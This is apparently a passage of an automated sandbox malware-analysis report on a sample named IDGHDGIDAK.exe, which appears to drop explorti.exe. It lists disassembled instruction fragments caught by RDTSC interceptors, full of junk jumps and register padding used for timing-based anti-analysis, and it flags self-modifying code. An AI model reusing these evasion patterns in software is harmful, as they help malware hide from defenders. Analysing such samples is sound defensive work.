Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F07FF second address: 50F08D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov ah, 56h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e mov bh, 47h 0x00000010 push esi 0x00000011 call 00007FC9F53DFD61h 0x00000016 pop esi 0x00000017 pop edi 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FC9F53DFD5Ch 0x0000001f push eax 0x00000020 pushad 0x00000021 mov edx, esi 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC9F53DFD64h 0x0000002c or si, AFE8h 0x00000031 jmp 00007FC9F53DFD5Bh 0x00000036 popfd 0x00000037 jmp 00007FC9F53DFD68h 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f call 00007FC9F53DFD5Eh 0x00000044 pushfd 0x00000045 jmp 00007FC9F53DFD62h 0x0000004a and eax, 35C284A8h 0x00000050 jmp 00007FC9F53DFD5Bh 0x00000055 popfd 0x00000056 pop ecx 0x00000057 mov edi, 5A3FA8ECh 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 movsx edx, cx 0x00000064 call 00007FC9F53DFD68h 0x00000069 pop esi 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F09F0 second address: 50F0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test byte ptr [76FA6968h], 00000002h 0x00000011 jmp 00007FC9F53C6A80h 0x00000016 jne 00007FCA671EC40Eh 0x0000001c jmp 00007FC9F53C6A80h 0x00000021 mov edx, dword ptr [ebp+0Ch] 0x00000024 jmp 00007FC9F53C6A80h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edx, 464E9EE0h 0x00000032 pushfd 0x00000033 jmp 00007FC9F53C6A89h 0x00000038 sub ecx, 2253DFE6h 0x0000003e jmp 00007FC9F53C6A81h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0A83 second address: 50F0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53DFD5Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AA7 second address: 50F0AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC9F53C6A86h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A87h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AE7 second address: 50F0AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AED second address: 50F0B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 mov si, di 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC9F53C6A88h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B22 second address: 50F0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B28 second address: 50F0B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B44 second address: 50F0B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B48 second address: 50F0B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B4E second address: 50F0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B63 second address: 50F0B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B67 second address: 50F0BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC9F53DFD66h 0x00000014 sub esi, 6AA77CF8h 0x0000001a jmp 00007FC9F53DFD5Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0BA1 second address: 50F0BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A80h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100CFC second address: 5100D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100D19 second address: 5100D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100D1F second address: 5100D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 79312966h 0x00000014 call 00007FC9F53DFD67h 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A52 second address: 5100A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A56 second address: 5100A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A70 second address: 5100ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A87h 0x00000016 add ecx, 6274CE7Eh 0x0000001c jmp 00007FC9F53C6A89h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100ABF second address: 5100AE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD5Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180616 second address: 518061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518061A second address: 5180620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180620 second address: 518064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53C6A85h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518064B second address: 5180668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180668 second address: 518066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518066C second address: 518067F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170AA9 second address: 5170AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170AC5 second address: 5170AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110008 second address: 51100B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53C6A88h 0x00000013 xor esi, 2A4D7248h 0x00000019 jmp 00007FC9F53C6A7Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FC9F53C6A88h 0x00000025 sub ax, B4A8h 0x0000002a jmp 00007FC9F53C6A7Bh 0x0000002f popfd 0x00000030 popad 0x00000031 pushfd 0x00000032 jmp 00007FC9F53C6A88h 0x00000037 or eax, 3762A708h 0x0000003d jmp 00007FC9F53C6A7Bh 0x00000042 popfd 0x00000043 popad 0x00000044 push eax 0x00000045 jmp 00007FC9F53C6A89h 0x0000004a xchg eax, ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100B8 second address: 51100BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100BE second address: 51100D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 9BC8h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100D0 second address: 51100E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100E8 second address: 51100EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170D06 second address: 5170D1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170D1B second address: 5170DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53C6A87h 0x00000009 sbb ax, 9CCEh 0x0000000e jmp 00007FC9F53C6A89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 jmp 00007FC9F53C6A7Ah 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FC9F53C6A7Fh 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FC9F53C6A84h 0x00000035 xor ecx, 06B11AD8h 0x0000003b jmp 00007FC9F53C6A7Bh 0x00000040 popfd 0x00000041 pushad 0x00000042 mov cx, 0C25h 0x00000046 mov ebx, eax 0x00000048 popad 0x00000049 popad 0x0000004a push dword ptr [ebp+08h] 0x0000004d pushad 0x0000004e mov ecx, 010907D9h 0x00000053 movzx eax, dx 0x00000056 popad 0x00000057 call 00007FC9F53C6A79h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FC9F53C6A7Ch 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170DD3 second address: 5170E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 19h 0x0000000d push esi 0x0000000e mov edi, 1E39BF62h 0x00000013 pop edx 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007FC9F53DFD5Fh 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170E0E second address: 5170E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170E14 second address: 5170E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD65h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120673 second address: 512068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512068B second address: 51206A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC9F53DFD5Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206A9 second address: 51206AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206AD second address: 51206B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206B3 second address: 51206D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC9F53C6A84h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206D6 second address: 5120709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 51519FE4h 0x00000008 jmp 00007FC9F53DFD5Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007FC9F53DFD5Eh 0x00000017 push 70A2E463h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120709 second address: 5120723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120723 second address: 512075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 add cx, CAE6h 0x0000000e jmp 00007FC9F53DFD61h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 065A247Bh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov di, ax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512075F second address: 51207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC9F53C6A81h 0x0000000a sbb al, FFFFFFF6h 0x0000000d jmp 00007FC9F53C6A81h 0x00000012 popfd 0x00000013 popad 0x00000014 call 00007FC9F53C6A79h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC9F53C6A7Dh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51207A3 second address: 5120865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9F53DFD61h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FC9F53DFD67h 0x00000019 pushfd 0x0000001a jmp 00007FC9F53DFD68h 0x0000001f jmp 00007FC9F53DFD65h 0x00000024 popfd 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jmp 00007FC9F53DFD61h 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 call 00007FC9F53DFD5Ah 0x00000039 pop eax 0x0000003a pushfd 0x0000003b jmp 00007FC9F53DFD5Bh 0x00000040 adc ch, FFFFFFAEh 0x00000043 jmp 00007FC9F53DFD69h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120865 second address: 512086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512086B second address: 5120917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a call 00007FC9F53DFD65h 0x0000000f mov edx, esi 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FC9F53DFD5Dh 0x00000018 sub ch, 00000046h 0x0000001b jmp 00007FC9F53DFD61h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr fs:[00000000h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FC9F53DFD5Ch 0x0000002f sub si, 5BE8h 0x00000034 jmp 00007FC9F53DFD5Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FC9F53DFD68h 0x00000040 sub cx, EE48h 0x00000045 jmp 00007FC9F53DFD5Bh 0x0000004a popfd 0x0000004b popad 0x0000004c nop 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC9F53DFD62h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120917 second address: 51209BC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC9F53C6A82h 0x00000008 or eax, 1F8513D8h 0x0000000e jmp 00007FC9F53C6A7Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, esi 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9F53C6A7Bh 0x00000021 or cx, 269Eh 0x00000026 jmp 00007FC9F53C6A89h 0x0000002b popfd 0x0000002c mov eax, 55D21A67h 0x00000031 popad 0x00000032 nop 0x00000033 jmp 00007FC9F53C6A7Ah 0x00000038 sub esp, 1Ch 0x0000003b pushad 0x0000003c mov edx, 792BA2B0h 0x00000041 popad 0x00000042 push esi 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FC9F53C6A82h 0x0000004a sub cl, FFFFFFF8h 0x0000004d jmp 00007FC9F53C6A7Bh 0x00000052 popfd 0x00000053 mov ah, 40h 0x00000055 popad 0x00000056 mov dword ptr [esp], ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov bx, cx 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51209BC second address: 5120A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53DFD5Dh 0x00000013 and ecx, 6D5250F6h 0x00000019 jmp 00007FC9F53DFD61h 0x0000001e popfd 0x0000001f mov edi, ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A01 second address: 5120A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9F53C6A87h 0x00000011 or ax, D6DEh 0x00000016 jmp 00007FC9F53C6A89h 0x0000001b popfd 0x0000001c mov cx, 1DA7h 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC9F53C6A84h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A69 second address: 5120A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120A6F second address: 5120AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC9F53C6A80h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A7Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AA3 second address: 5120AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC9F53DFD66h 0x0000000f mov eax, dword ptr [76FAB370h] 0x00000014 jmp 00007FC9F53DFD60h 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c jmp 00007FC9F53DFD60h 0x00000021 xor eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AF9 second address: 5120AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120AFD second address: 5120B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120B01 second address: 5120B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120B07 second address: 5120B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: B0E9B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: CBAEAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: CE26C7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Special instruction interceptor: First address: D47A4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 35E9B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 50AEAE instructions caused by: Self-modifying code
